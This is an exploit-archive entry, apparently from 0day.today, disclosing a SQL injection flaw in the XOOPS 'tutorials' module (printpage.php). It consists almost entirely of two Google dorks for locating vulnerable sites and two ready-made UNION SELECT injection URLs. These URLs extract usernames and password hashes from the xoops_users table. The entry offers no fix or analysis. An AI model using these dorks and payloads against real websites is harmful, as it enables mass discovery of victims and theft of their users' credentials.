id: 2735
date: 03/12/2008
title: XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability
author: S@BUN
cves: 

==================================================================
XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability
==================================================================


###########################################
#
# DORKS 1 : allinurl :"/modules/tutorials/"
#
# DORK 2 : allinurl :"/modules/tutorials/"tid
#
###########################################
EXPLOIT 1 :

modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/*

EXPLOIT 2 :

modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*



#  0day.today [2023-03-21]  #